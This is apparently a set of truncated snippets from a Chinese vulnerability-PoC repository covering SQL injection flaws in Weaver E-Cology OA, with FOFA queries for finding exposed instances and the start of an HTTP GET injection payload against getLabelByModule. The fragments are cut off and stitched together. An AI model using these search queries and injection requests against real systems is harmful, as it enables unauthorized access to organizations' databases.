18 changes: 18 additions & 0 deletions 18 泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,18 @@ ## 泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞 ## fofa ``` app="泛微-OA(e-cology)" ``` ## poc ``...
泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感文件 ## 漏洞影响 ``` 泛微OA E-Cology ``` ## FOFA ``` app="泛微-协同办公OA" ``` ## 漏洞复现 登录页面 ![image-20220706133317122](https://typora-notes-1308934770.cos.ap-beijing.myqcloud...
由于泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞,远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。 ##搜索语法 fofa:`app="泛微-协同办公OA"` ##POC ```http GET /api/ec/dev/locale/getLabelByModule?moduleCode=1%27)%20...